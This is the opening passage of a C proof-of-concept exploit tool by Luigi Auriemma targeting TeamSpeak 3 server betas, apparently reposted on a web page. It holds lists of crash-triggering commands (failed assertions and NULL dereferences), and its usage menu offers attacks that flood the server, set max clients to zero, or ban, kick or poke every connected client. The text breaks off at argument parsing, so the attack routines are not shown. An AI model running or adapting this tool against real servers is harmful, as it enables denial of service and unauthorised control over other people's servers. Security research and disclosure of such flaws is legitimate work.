Teamspeak <= 3.0.0-beta25 Multiple Remote

/*
  by Luigi Auriemma
*/
  
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <time.h>
  
#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"
  
    #define close   closesocket
    #define sleep   Sleep
    #define ONESEC  1000
    #define waitms(x)   sleep(x)
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>
  
    #define ONESEC  1
    #define stristr strcasestr
    #define stricmp strcasecmp
    #define waitms(x)   sleep(x * 1000)
#endif
  
typedef uint8_t     u8;
typedef uint16_t    u16;
typedef uint32_t    u32;
  
  
  
#define VER         "0.1"
#define PORT        9987
#define BUFFSZ      0x400   // max 0x1f4 for "packetType != 1"
  
#define SCAN_MS     40
#define INIT_TS3    if(sd) close(sd); \
                    sd = udp_sock(); \
                    p = buff; \
                    p += putrr(p, 8);       /* tag */ \
                    p += putxx(p, 0, 16);   /* header... */ \
                    p += putxx(p, 0, 16); \
                    p += putxx(p, 2, 8);    /* packetType 2 is COMMAND */
  
  
  
static u8 *assert_cmds[] = {
    "banlist",
    "complainlist",
    "servernotifyunregister",
    "serverrequestconnectioninfo",
    "setconnectioninfo",
    "servernotifyregister event=server",
    NULL
};
  
static u8 *null_cmds[] = {
    "bandelall",
    "channelcreate channel_name=name",
    "channelsubscribe cid=1",
    "channelsubscribeall",
    "banadd ip=1.2.3.4",
    "clientedit clid=1 client_description=none",
    "messageupdateflag msgid=1 flag=1",
    "complainadd tcldbid=1 message=none",
    "complaindelall tcldbid=1",
    "ftinitupload clientftfid=1 name=file.txt cid=5 cpw= size=9999 overwrite=1 resume=0",
    "ftgetfilelist cid=1 cpw= path=\\/",
    "ftdeletefile cid=1 cpw= name=\\/",
    "ftcreatedir cid=1 cpw= dirname=\\/",
    "ftrenamefile cid=1 cpw= tcid=1 tcpw=secret oldname=\\/ newname=\\/",
    "ftinitdownload clientftfid=1 name=\\/ cid=1 cpw= seekpos=0",
    NULL
};
  
static u8 *virtualserver[] = {
    "virtualserver_antiflood_ban_time",
    "virtualserver_antiflood_points_needed_ban",
    "virtualserver_antiflood_points_needed_kick",
    "virtualserver_antiflood_points_needed_warning",
    "virtualserver_antiflood_points_tick_reduce",
    "virtualserver_autostart",
    "virtualserver_channelsonline",
    "virtualserver_client_connections",
    "virtualserver_clientsonline",
    "virtualserver_complain_autoban_count",
    "virtualserver_complain_autoban_time",
    "virtualserver_complain_remove_time",
    "virtualserver_created",
    "virtualserver_default_channel_admin_group",
    "virtualserver_default_channel_group",
    "virtualserver_default_server_group",
    "virtualserver_download_quota",
    "virtualserver_filebase",
    "virtualserver_flag_password",
    "virtualserver_hostbanner_gfx_interval",
    "virtualserver_hostbanner_gfx_url",
    "virtualserver_hostbanner_url",
    "virtualserver_hostbutton_gfx_url",
    "virtualserver_hostbutton_tooltip",
    "virtualserver_hostbutton_url",
    "virtualserver_hostmessage",
    "virtualserver_hostmessage_mode",
    "virtualserver_icon_id",
    "virtualserver_id",
    "virtualserver_keypair",
    "virtualserver_log_channel",
    "virtualserver_log_client",
    "virtualserver_log_filetransfer",
    "virtualserver_log_permissions",
    "virtualserver_log_query",
    "virtualserver_log_server",
    "virtualserver_machine_id",
    "virtualserver_max_download_total_bandwidth",
    "virtualserver_max_upload_total_bandwidth",
    "virtualserver_maxclients",
    "virtualserver_min_client_version",
    "virtualserver_min_clients_in_channel_before_forced_silence",
    "virtualserver_month_bytes_downloaded",
    "virtualserver_month_bytes_uploaded",
    "virtualserver_name_phonetic",
    "virtualserver_needed_identity_security_level",
    "virtualserver_password",
    "virtualserver_platform",
    "virtualserver_port",
    "virtualserver_priority_speaker_dimm_modificator",
    "virtualserver_query_client_connections",
    "virtualserver_queryclientsonline",
    "virtualserver_reserved_slots",
    "virtualserver_total_bytes_downloaded",
    "virtualserver_total_bytes_uploaded",
    "virtualserver_total_packetloss_control",
    "virtualserver_total_packetloss_keepalive",
    "virtualserver_total_packetloss_speech",
    "virtualserver_total_packetloss_total",
    "virtualserver_total_ping",
    "virtualserver_upload_quota",
    "virtualserver_uptime",
    "virtualserver_version",
    NULL
};
  
  
  
int ts3_crypt(unsigned char *key /*includes nonce*/, int hdrlen, unsigned char *data, int data_len, int encrypt);
int udp_sock(void);
int putrr(u8 *dst, int len);
int putmm(u8 *dst, u8 *src, int len);
int putxx(u8 *data, u32 num, int bits);
int send_recv(int sd, u8 *in, int insz, u8 *out, int outsz, struct sockaddr_in *peer, int err);
int timeout(int sock, int secs);
u32 resolv(char *host);
void std_err(void);
  
  
  
int main(int argc, char *argv[]) {
    struct  sockaddr_in peer;
    int     sd      = 0,
            i,
            len,
            bug;
    u16     port    = PORT;
    u8      buff[BUFFSZ],
            *host,
            *p;
  
#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif
  
    setbuf(stdout, NULL);
  
    fputs("\n"
        "TeamSpeak 3 <= 3.0.0-beta23 multiple vulnerabilities "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);
  
    if(argc < 3) {
        printf("\n"
            "Usage: %s <bug> <host> [port(%d)]>\n"
            "\n"
            "Bugs and some examples:\n"
            " 1 = interface for sending any custom command\n"
            " 2 = test the failed assertions\n"
            " 3 = test the NULL pointer dereferences\n"
            "\n"
            " 4 = flooding of random server messages\n"
            " 5 = set the number of max clients to 0 (USE bug 1 and virtualserver for more)\n"
            " 6 = ban all the clients currently in the server\n"
            " 7 = unban all the banned clients\n"
            " 8 = kick all the clients currently in the server\n"
            " 9 = send a poke message to all the clients in the server\n"
            "\n", argv[0], port);
        exit(1);
    }
  
    bug  = atoi(argv[1]);
    host = argv[2];
    if(argc > 3) port = atoi(argv[3]);
  
<

发表评论?

0 条评论。

发表评论